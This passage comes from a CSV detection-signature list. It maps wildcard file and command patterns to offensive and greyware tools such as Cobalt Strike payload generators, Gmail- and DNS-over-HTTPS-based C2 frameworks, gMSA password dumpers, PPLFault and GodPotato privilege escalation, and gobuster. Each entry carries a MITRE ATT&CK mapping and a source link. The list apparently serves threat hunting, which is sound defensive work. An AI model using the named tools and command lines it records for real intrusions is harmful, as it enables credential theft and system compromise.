users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe user*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-i686-pc-windows-msvc*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-main.zip*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-x86_64-apple-darwin*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit-x86_64-pc-windows-msvc*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" 
+"*glit-x86_64-unknown-linux-gnu*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","1","risk of False positive","10","10","N/A","N/A","N/A","N/A" +"*gloxec/CrossC2*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*gloxec/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*GmailC2.csproj*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*gMSADumper.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gMSADumper.py*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"*GMSAPasswordReader.exe*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*GMSAPasswordReader-master*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" 
+"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*go build Ivy.go*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*go run poc.go check -t http://*:8080 -u Admin*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" +"*go run scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*go_shellcode_encode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","191","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" +"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster dir -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster fuzz 
-*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - 
TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" 
+"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*godoh -*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh agent*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh c2*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh help*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh receive*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh send*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh test*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh-darwin64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh-linux64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh-windows32.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*godoh-windows64.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
+"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z"
